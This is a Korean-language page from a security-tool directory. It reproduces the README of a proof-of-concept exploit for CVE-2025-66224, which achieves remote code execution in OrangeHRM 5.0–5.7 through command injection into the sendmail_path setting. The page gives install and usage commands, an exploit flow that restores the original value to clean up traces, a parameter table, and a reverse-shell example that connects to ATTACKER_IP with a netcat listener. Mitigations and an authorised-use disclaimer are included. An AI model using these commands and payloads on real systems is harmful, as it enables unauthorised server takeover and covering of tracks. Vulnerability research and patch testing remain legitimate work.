Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-CVE-2025-66224 — CVE-2025-66224에 대한 개념 증명(PoC) 익스플로잇으로, sendmail_path 매개변수의 명령 주입을 통해 OrangeHRM에서 원격 코드 실행을 시연하며, 자동화된 데이터베이스 페이로드 주입 및 정리 기능을 포함합니다. | Kitploit
도구/GitHubGitHub/richard-natan/poc-cve-2025-66224
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationDatabase Security
GitHubrichard-natan/poc-cve-2025-66224

PoC-CVE-2025-66224

CVE-2025-66224에 대한 개념 증명(PoC) 익스플로잇으로, sendmail_path 매개변수의 명령 주입을 통해 OrangeHRM에서 원격 코드 실행을 시연하며, 자동화된 데이터베이스 페이로드 주입 및 정리 기능을 포함합니다.

저장소 보기
28개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

OrangeHRM RCE 익스플로잇 - CVE-2025-66224

📋 설명

이 개념 증명(PoC)은 OrangeHRM의 sendmail_path 구성 매개변수에 대한 명령 주입을 통해 원격 코드 실행(RCE) 취약점을 입증합니다.

이 익스플로잇은 다음 방식으로 동작합니다:

  1. MySQL 데이터베이스(hs_hr_config 테이블)에 악성 페이로드를 주입합니다.
  2. 이메일 구성 API 엔드포인트를 통해 페이로드 실행을 트리거합니다.
  3. 원래 값을 자동으로 복원하여 추적을 정리합니다.

🎯 영향을 받는 버전

  • OrangeHRM 5.0 ~ 5.7

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

🔧 요구 사항

root@kitploit:~
pip install requests mysql-connector-python

📦 설치

root@kitploit:~
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt

🚀 사용법

1단계: 세션 쿠키 확보

  1. 웹 인터페이스를 통해 OrangeHRM에 로그인합니다.
  2. 브라우저 개발자 도구(F12)를 엽니다.
  3. 저장소 > 쿠키(Firefox) 또는 애플리케이션 > 쿠키(Chrome)로 이동합니다.
  4. _orangehrm 쿠키 값을 복사합니다.

2단계: 익스플로잇 실행

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \
    -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \
    -cmd '<COMMAND_TO_EXECUTE>'

예제 - 간단한 명령

root@kitploit:~
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"

예제 - 리버스 셸

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute exploit with reverse shell payload
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 매개변수

🔍 작동 원리

취약점 세부 사항

이 취약점은 sendmail_path 매개변수가 데이터베이스에 저장된 후 적절한 검증 없이 실행되는 이메일 구성 기능에 존재합니다.

익스플로잇 흐름:

root@kitploit:~
1. Authenticate to OrangeHRM (obtain valid session cookie)
   ↓
2. Connect to MySQL database
   ↓
3. Locate hs_hr_config table
   ↓
4. Update email_config.sendmail_path value:
   FROM: /usr/sbin/sendmail -bs
   TO:   /usr/sbin/sendmail -bs && <PAYLOAD> #
   ↓
5. Trigger execution via API:
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. Command executes on server
   ↓
7. Restore original value (cleanup)

기술적 세부 사항

취약한 매개변수: email_config.sendmail_path

데이터베이스:

  • 테이블: hs_hr_config
  • 컬럼: name = 'email_config.sendmail_path'
  • 컬럼: value = sendmail 명령 경로

트리거 엔드포인트:

root@kitploit:~
PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 완화 방법

  1. 입력 검증: sendmail_path 매개변수에 대한 엄격한 검증 구현
  2. 이스케이프: 실행 전에 셸 명령을 적절히 이스케이프
  3. 최소 권한: 웹 서버를 최소 권한으로 실행
  4. 업데이트: OrangeHRM 최신 보안 패치 적용

🤝 크레딧

PoC 작성: RiccK

팀: Bypassadores && HackersOnSteroids

🔗 참조

  • CVE-2025-66224

⚠️ 책임 있는 사용. 테스트 전 반드시 적절한 승인을 받으십시오.

도구 다운로드
매개변수단축필수설명
--target-t✅대상 URL (예: http://target.com)
--cookie-c✅세션 쿠키 값
--cookie_name-cn❌쿠키 이름 (기본값: _orangehrm)
--command-cmd✅대상에서 실행할 명령
--db_host-dh✅MySQL 호스트 주소
--db_user-du✅MySQL 사용자 이름
--db_pass-dp✅MySQL 비밀번호
--db_port-dport❌MySQL 포트 (기본값: 3306)